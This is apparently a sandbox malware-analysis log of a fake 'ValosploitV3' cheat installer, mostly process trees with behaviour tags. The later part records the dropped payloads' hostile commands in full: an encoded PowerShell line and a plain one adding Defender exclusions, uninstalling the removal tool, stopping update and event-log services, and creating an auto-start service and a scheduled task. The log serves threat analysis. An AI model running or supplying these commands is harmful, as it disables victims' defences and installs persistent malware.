PID 3868 wrote to memory of 4388	3868	chrome.exe	88
PID 3868 wrote to memory of 4388	3868	chrome.exe	88
PID 3868 wrote to memory of 4388	3868	chrome.exe	88
PID 3868 wrote to memory of 4388	3868	chrome.exe	88
PID 3868 wrote to memory of 4388	3868	chrome.exe	88
PID 3868 wrote to memory of 4388	3868	chrome.exe	88
PID 3868 wrote to memory of 4388	3868	chrome.exe	88
PID 3868 wrote to memory of 4388	3868	chrome.exe	88
PID 3868 wrote to memory of 4388	3868	chrome.exe	88
PID 3868 wrote to memory of 4388	3868	chrome.exe	88
PID 3868 wrote to memory of 4388	3868	chrome.exe	88
PID 3868 wrote to memory of 4388	3868	chrome.exe	88
PID 3868 wrote to memory of 4388	3868	chrome.exe	88
PID 3868 wrote to memory of 4388	3868	chrome.exe	88
PID 3868 wrote to memory of 4388	3868	chrome.exe	88
PID 3868 wrote to memory of 4388	3868	chrome.exe	88
PID 3868 wrote to memory of 4388	3868	chrome.exe	88
PID 3868 wrote to memory of 4388	3868	chrome.exe	88
PID 3868 wrote to memory of 4388	3868	chrome.exe	88
PID 3868 wrote to memory of 4388	3868	chrome.exe	88
PID 3868 wrote to memory of 4388	3868	chrome.exe	88
PID 3868 wrote to memory of 4388	3868	chrome.exe	88
PID 3868 wrote to memory of 4388	3868	chrome.exe	88
PID 3868 wrote to memory of 4388	3868	chrome.exe	88
PID 3868 wrote to memory of 4388	3868	chrome.exe	88
PID 3868 wrote to memory of 4388	3868	chrome.exe	88
PID 3868 wrote to memory of 1156	3868	chrome.exe	89
PID 3868 wrote to memory of 1156	3868	chrome.exe	89
PID 3868 wrote to memory of 4668	3868	chrome.exe	90
PID 3868 wrote to memory of 4668	3868	chrome.exe	90
PID 3868 wrote to memory of 4668	3868	chrome.exe	90
PID 3868 wrote to memory of 4668	3868	chrome.exe	90
PID 3868 wrote to memory of 4668	3868	chrome.exe	90
PID 3868 wrote to memory of 4668	3868	chrome.exe	90
PID 3868 wrote to memory of 4668	3868	chrome.exe	90
PID 3868 wrote to memory of 4668	3868	chrome.exe	90
PID 3868 wrote to memory of 4668	3868	chrome.exe	90
PID 3868 wrote to memory of 4668	3868	chrome.exe	90
PID 3868 wrote to memory of 4668	3868	chrome.exe	90
PID 3868 wrote to memory of 4668	3868	chrome.exe	90
PID 3868 wrote to memory of 4668	3868	chrome.exe	90
PID 3868 wrote to memory of 4668	3868	chrome.exe	90
PID 3868 wrote to memory of 4668	3868	chrome.exe	90
PID 3868 wrote to memory of 4668	3868	chrome.exe	90
PID 3868 wrote to memory of 4668	3868	chrome.exe	90
PID 3868 wrote to memory of 4668	3868	chrome.exe	90
PID 3868 wrote to memory of 4668	3868	chrome.exe	90
PID 3868 wrote to memory of 4668	3868	chrome.exe	90
PID 3868 wrote to memory of 4668	3868	chrome.exe	90
PID 3868 wrote to memory of 4668	3868	chrome.exe	90
PID 3868 wrote to memory of 4668	3868	chrome.exe	90
PID 3868 wrote to memory of 4668	3868	chrome.exe	90
PID 3868 wrote to memory of 4668	3868	chrome.exe	90
PID 3868 wrote to memory of 4668	3868	chrome.exe	90
PID 3868 wrote to memory of 4668	3868	chrome.exe	90
PID 3868 wrote to memory of 4668	3868	chrome.exe	90
PID 3868 wrote to memory of 4668	3868	chrome.exe	90
PID 3868 wrote to memory of 4668	3868	chrome.exe	90

C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\Obey_Omnis_e-GT.ini
1⤵
PID:4812

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3868
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffd67f2cc40,0x7ffd67f2cc4c,0x7ffd67f2cc58
  2⤵
  PID:4228
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1844,i,14088466305261714665,18367418857615293014,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=1840 /prefetch:2
  2⤵
  PID:4388
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1784,i,14088466305261714665,18367418857615293014,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2208 /prefetch:3
  2⤵
  PID:1156
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2288,i,14088466305261714665,18367418857615293014,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2456 /prefetch:8
  2⤵
  PID:4668
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3156,i,14088466305261714665,18367418857615293014,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3172 /prefetch:1
  2⤵
  PID:856
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3148,i,14088466305261714665,18367418857615293014,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3420 /prefetch:1
  2⤵
  PID:1736
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4564,i,14088466305261714665,18367418857615293014,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4560 /prefetch:1
  2⤵
  PID:3092
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4776,i,14088466305261714665,18367418857615293014,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4808 /prefetch:8
  2⤵
  PID:4604
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5064,i,14088466305261714665,18367418857615293014,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5048 /prefetch:8
  2⤵
  PID:1868
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=5160,i,14088466305261714665,18367418857615293014,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5108 /prefetch:1
  2⤵
  PID:804
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=5084,i,14088466305261714665,18367418857615293014,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3192 /prefetch:1
  2⤵
  PID:1380
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=3212,i,14088466305261714665,18367418857615293014,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3288 /prefetch:1
  2⤵
  PID:5048
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=4536,i,14088466305261714665,18367418857615293014,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3420 /prefetch:1
  2⤵
  PID:2444
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5192,i,14088466305261714665,18367418857615293014,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3144 /prefetch:1
  2⤵
  PID:536
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5528,i,14088466305261714665,18367418857615293014,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4852 /prefetch:1
  2⤵
  PID:5012
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5644,i,14088466305261714665,18367418857615293014,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5656 /prefetch:1
  2⤵
  PID:4516
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=5920,i,14088466305261714665,18367418857615293014,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5948 /prefetch:1
  2⤵
  PID:1212
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=6280,i,14088466305261714665,18367418857615293014,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=6296 /prefetch:1
  2⤵
  PID:1448
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=6000,i,14088466305261714665,18367418857615293014,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=6488 /prefetch:1
  2⤵
  PID:4792
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6024,i,14088466305261714665,18367418857615293014,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3440 /prefetch:8
  2⤵
  PID:4636
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=6104,i,14088466305261714665,18367418857615293014,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5808 /prefetch:8
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  PID:2716

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:2016

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4404

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4236

C:\Users\Admin\Downloads\ValosploitV3_Installer\ValosploitV3_Installer\Installer.exe
"C:\Users\Admin\Downloads\ValosploitV3_Installer\ValosploitV3_Installer\Installer.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:740
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AbQBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAcABpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAbgBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAcQB2ACMAPgA="
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:3684
- C:\Users\Admin\AppData\Local\Temp\Ilkdt.exe
  "C:\Users\Admin\AppData\Local\Temp\Ilkdt.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2460
- C:\Users\Admin\AppData\Local\Temp\WinHostMgr.exe
  "C:\Users\Admin\AppData\Local\Temp\WinHostMgr.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  PID:3708
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:7680
  - - C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:6272
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:7748
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:8128
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop wuauserv
    3⤵
    - Launches sc.exe
    PID:6912
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop bits
    3⤵
    - Launches sc.exe
    PID:7392
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop dosvc
    3⤵
    - Launches sc.exe
    PID:5472
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    PID:5488
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    PID:5356
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    PID:5344
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    PID:5456
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "GMDTJRUT"
    3⤵
    - Launches sc.exe
    PID:4624
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "GMDTJRUT" binpath= "C:\ProgramData\vcnwldzucnvl\bauwrdgwodhv.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:7796
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:8132
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "GMDTJRUT"
    3⤵
    - Launches sc.exe
    PID:8160
- C:\Users\Admin\AppData\Local\Temp\WinErrorMgr.exe
  "C:\Users\Admin\AppData\Local\Temp\WinErrorMgr.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2020
- - C:\Users\Admin\AppData\Local\Temp\XenoManager\WinErrorMgr.exe
    "C:\Users\Admin\AppData\Local\Temp\XenoManager\WinErrorMgr.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:5260
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks.exe" /Create /TN "WindowsErrorHandler" /XML "C:\Users\Admin\AppData\Local\Temp\tmp95D9.tmp" /F
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:6364
- C:\Users\Admin\AppData\Roaming\KeyGeneratorI.exe
  "C:\Users\Admin\AppData\Roaming\KeyGeneratorI.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:3896
- - C:\Users\Admin\AppData\Roaming\KeyGeneratorI.exe
    "C:\Users\Admin\AppData\Roaming\KeyGeneratorI.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetWindowsHookEx
    PID:1432
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://onepiecered.co/s?mH4q
      4⤵
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of SendNotifyMessage
      PID:4380
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffd761246f8,0x7ffd76124708,0x7ffd76124718
        5⤵
        
        PID:5008
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,11552935196715985135,6095431877402696071,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2192 /prefetch:2
        5⤵
        
        PID:1552
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,11552935196715985135,6095431877402696071,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:3
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4400
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2168,11552935196715985135,6095431877402696071,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2792 /prefetch:8
        5⤵
        
        PID:6740
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,11552935196715985135,6095431877402696071,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
        5⤵
        
        PID:7404
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,11552935196715985135,6095431877402696071,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
        5⤵
        
        PID:7424
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,11552935196715985135,6095431877402696071,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4788 /prefetch:1
        5⤵
        
        PID:6108
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,11552935196715985135,6095431877402696071,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5008 /prefetch:1
        5⤵
        
        PID:2348
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,11552935196715985135,6095431877402696071,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5480 /prefetch:8
        5⤵
        
        PID:2588
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,11552935196715985135,6095431877402696071,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5480 /prefetch:8
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:6228
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,11552935196715985135,6095431877402696071,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5732 /prefetch:1
        5⤵
        
        PID:6584
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,11552935196715985135,6095431877402696071,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5820 /prefetch:1
        5⤵
        
        PID:7556
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,11552935196715985135,6095431877402696071,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3932 /prefetch:1
        5⤵
        
        PID:1436
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,11552935196715985135,6095431877402696071,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4944 /prefetch:1
        5⤵
        
        PID:1340
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,11552935196715985135,6095431877402696071,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4068 /prefetch:1
        5⤵
        
        PID:8040
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,11552935196715985135,6095431877402696071,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4168 /prefetch:1
        5⤵
        
        PID:3168
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,11552935196715985135,6095431877402696071,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4812 /prefetch:1
        5⤵
        
        PID:7660
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,11552935196715985135,6095431877402696071,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5896 /prefetch:1
        5⤵
        
        PID:5924
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,11552935196715985135,6095431877402696071,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6404 /prefetch:1
        5⤵
        
        PID:3920
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,11552935196715985135,6095431877402696071,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6464 /prefetch:1
        5⤵
        
